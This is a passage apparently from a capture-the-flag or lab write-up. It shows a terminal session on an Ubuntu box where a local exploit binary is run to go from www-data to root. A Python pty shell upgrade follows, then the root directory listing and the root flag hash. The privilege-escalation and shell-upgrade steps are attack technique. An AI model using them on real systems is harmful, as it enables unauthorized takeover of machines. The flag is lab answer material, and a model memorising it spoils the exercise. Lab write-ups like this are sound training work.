www-data@ubuntu:/tmp$ ./45010x
./45010x
whoami
root

Privilege escalation succeeded.

Get the flag

python -c "import pty;pty.spawn('/bin/bash')";
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls -liah
ls -liah
total 92K
917506 drwx------  5 root root 4.0K Aug 31  2019 .
2 drwxr-xr-x 24 root root 4.0K Aug 29  2019 ..
964588 -rw-------  1 root root 8.4K Sep  1  2019 .bash_history
917598 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
917597 drwx------  3 root root 4.0K Aug 30  2019 .cache
969791 -rw-------  1 root root  137 Aug 30  2019 .mysql_history
964098 drwxr-xr-x  2 root root 4.0K Aug 29  2019 .nano
917599 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
969796 -rw-r--r--  1 root root   66 Aug 31  2019 .selected_editor
969793 -rwxr-xr-x  1 root root  14K Aug 30  2019 enc
969795 -rw-r--r--  1 root root  305 Aug 30  2019 enc.cpp
969797 -rw-r--r--  1 root root  237 Aug 30  2019 enc.txt
969798 -rw-r--r--  1 root root  123 Aug 30  2019 key.txt
969794 -rw-r--r--  1 root root   33 Aug 30  2019 root.txt
969780 -rw-r--r--  1 root root  805 Aug 30  2019 sql.py
969790 -rwxr-xr-x  1 root root  442 Aug 31  2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30  2019 wfuzz
964464 -rw-r--r--  1 root root  170 Aug 29  2019 wordpress.sql
root@ubuntu:/root# cat root.txt
cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root#